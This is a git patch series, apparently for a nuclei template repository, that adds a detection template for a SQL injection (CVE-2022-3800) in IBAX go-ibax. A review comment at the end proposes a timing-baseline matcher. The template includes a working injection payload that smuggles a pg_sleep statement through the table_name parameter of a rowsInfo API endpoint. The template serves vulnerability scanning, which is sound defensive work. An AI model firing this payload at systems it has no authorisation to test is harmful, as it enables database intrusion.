From a5ffcef441bf9f647e35fc0974f37704e10f74ba Mon Sep 17 00:00:00 2001
From: Jon Cagan
Date: Sun, 19 Feb 2023 14:36:38 -0500
Subject: [PATCH 1/4] Added CVE-2022-3800 Template
---
cves/2022/CVE-2022-3800.yaml | 47 ++++++++++++++++++++++++++++++++++++
1 file changed, 47 insertions(+)
create mode 100644 cves/2022/CVE-2022-3800.yaml
diff --git a/cves/2022/CVE-2022-3800.yaml b/cves/2022/CVE-2022-3800.yaml
new file mode 100644
index 0000000000..67bf3e4be5
--- /dev/null
+++ b/cves/2022/CVE-2022-3800.yaml
@@ -0,0 +1,47 @@
+id: go-ibax-sqli
+
+info:
+ name: IBAX go-ibax - SQL Injection
+ author: JC175
+ severity: high
+ description: |
+ IBAX go-ibax contains a SQL injection vulnerability via the table_name parameter. An attacker can spoof identity, tamper with or view existing data, destroy the data or make it otherwise unavailable, and become administrators of the database server. This issue affects versions starting from commits on Jul 18, 2020 until Dec 2, 2022.
+ reference:
+ - https://github.com/IBAX-io/go-ibax/issues/2061
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-3800
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cwe-id: CWE-89
+ metadata:
+ verified: true
+ tags: cve,cve2022,IBAX,go-ibax,sqli
+
+requests:
+ - raw:
+ - |
+ POST /api/v2/open/rowsInfo HTTP/2
+ Host: {{Hostname}}
+ User-Agent: {{header}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 71
+ order=1&table_name=pg_user"%3b+select+pg_sleep(1)%3b+--"&limit=1&page=1
+ matchers-condition: and
+ matchers:
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "Content-Type: application/json"
+
+ - type: word
+ part: body
+ words:
+ - '"passwd":'
+ - '"usename":'
+ - '"usesysid":'
\ No newline at end of file
From a26ce9f9f28b33333610a0365c4d393ae1660f67 Mon Sep 17 00:00:00 2001 From: Jon Cagan Date: Mon, 20 Feb 2023 11:12:58 -0500 Subject: [PATCH 2/4] Removed trailing spaces and added ending newline. --- cves/2022/CVE-2022-3800.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2022/CVE-2022-3800.yaml b/cves/2022/CVE-2022-3800.yaml index 67bf3e4be5..b3922fc10d 100644 --- a/cves/2022/CVE-2022-3800.yaml +++ b/cves/2022/CVE-2022-3800.yaml @@ -29,19 +29,19 @@ requests: order=1&table_name=pg_user"%3b+select+pg_sleep(1)%3b+--"&limit=1&page=1 matchers-condition: and matchers: - + - type: status status: - 200 - + - type: word part: header words: - "Content-Type: application/json" - + - type: word part: body words: - '"passwd":' - '"usename":' - - '"usesysid":' \ No newline at end of file + - '"usesysid":' From 1cd2fa2d1d1b19ad166fe376a2f7dde4f68b13ac Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 20 Mar 2023 13:54:18 +0530 Subject: [PATCH 3/4] fix formatting --- cves/2022/CVE-2022-3800.yaml | 41 +++++++++++++----------------------- 1 file changed, 15 insertions(+), 26 deletions(-) diff --git a/cves/2022/CVE-2022-3800.yaml b/cves/2022/CVE-2022-3800.yaml index b3922fc10d..2eb2bfbd3d 100644 --- a/cves/2022/CVE-2022-3800.yaml +++ b/cves/2022/CVE-2022-3800.yaml 
@@ -1,47 +1,36 @@ -id: go-ibax-sqli +id: CVE-2022-3800 info: name: IBAX go-ibax - SQL Injection author: JC175 severity: high description: | - IBAX go-ibax contains a SQL injection vulnerability via the table_name parameter. An attacker can spoof identity, tamper with or view existing data, destroy the data or make it otherwise unavailable, and become administrators of the database server. This issue affects versions starting from commits on Jul 18, 2020 until Dec 2, 2022. + A vulnerability, which was classified as critical, has been found in IBAX go-ibax. Affected by this issue is some unknown functionality of the file /api/v2/open/rowsInfo. The manipulation of the argument table_name leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used reference: - https://github.com/IBAX-io/go-ibax/issues/2061 - https://nvd.nist.gov/vuln/detail/CVE-2022-3800 + - https://vuldb.com/?id.212636 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cwe-id: CWE-89 - metadata: - verified: true - tags: cve,cve2022,IBAX,go-ibax,sqli + tags: cve,cve2022,ibax,go-ibax,sqli requests: - raw: - | - POST /api/v2/open/rowsInfo HTTP/2 + POST /api/v2/open/rowsInfo HTTP/1.1 Host: {{Hostname}} - User-Agent: {{header}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Content-Type: application/x-www-form-urlencoded - Content-Length: 71 - order=1&table_name=pg_user"%3b+select+pg_sleep(1)%3b+--"&limit=1&page=1 - matchers-condition: and + + order=1&table_name=pg_user"%3b+select+pg_sleep(6)%3b+--"&limit=1&page=1 + matchers: - - - type: status - status: - - 200 - - - type: word - part: header - words: - - "Content-Type: application/json" - - - type: word - part: body - words: - - '"passwd":' - - '"usename":' - - '"usesysid":' + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 
'contains(content_type, "application/json")' + - 'contains(body, "usesysid")' + condition: and From 7951575c74aad902678225d43374d5c18bb13152 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 22 Mar 2023 16:56:52 +0530 Subject: [PATCH 4/4] added timeout added a timeout just in case. --- cves/2022/CVE-2022-3800.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-3800.yaml b/cves/2022/CVE-2022-3800.yaml index 2eb2bfbd3d..59870c62ed 100644 --- a/cves/2022/CVE-2022-3800.yaml +++ b/cves/2022/CVE-2022-3800.yaml @@ -12,6 +12,7 @@ info: - https://vuldb.com/?id.212636 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cve-id: CVE-2022-3800 cvss-score: 8.8 cwe-id: CWE-89 tags: cve,cve2022,ibax,go-ibax,sqli @@ -19,9 +20,9 @@ info: requests: - raw: - | + @timeout: 15s POST /api/v2/open/rowsInfo HTTP/1.1 Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Content-Type: application/x-www-form-urlencoded order=1&table_name=pg_user"%3b+select+pg_sleep(6)%3b+--"&limit=1&page=1
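Review bot: The rewritten matcher in this hunk makes `duration>=6` on a single request the only evidence of injection, so a target that simply takes six seconds or more to answer an ordinary rowsInfo query (slow backend, rate limiting, a large result) is reported as vulnerable, and nothing ties the delay to the injected clause; the status, content-type and `usesysid` checks are all satisfied by a legitimate `table_name=pg_user` response too. A more robust shape is a baseline request that sends the same form body without the injected clause (`order=1&table_name=pg_user&limit=1&page=1`) ahead of the timed one, `req-condition: true`, and a matcher that compares the two timings, e.g. `'duration_2 - duration_1 >= 5'` — the suffixed `duration_1`/`status_code_2` style variables depend on req-condition, so confirm the exact names against the nuclei DSL documentation for the version this repository targets. The replacement description is also cut off mid-sentence after `may be used` and drops the affected-range sentence the previous text carried (commits from Jul 18, 2020 until Dec 2, 2022), which is the one piece of triage information the vuldb boilerplate lacks; ending it as `... and may be used. This issue affects versions starting from commits on Jul 18, 2020 until Dec 2, 2022.` keeps both.
```yaml
requests:
  - raw:
      - |
        POST /api/v2/open/rowsInfo HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        order=1&table_name=pg_user&limit=1&page=1
      # … unchanged: the existing timed request with the pg_sleep(6) clause …
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'duration_2 - duration_1 >= 5'
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "application/json")'
          - 'contains(body_2, "usesysid")'
        condition: and
```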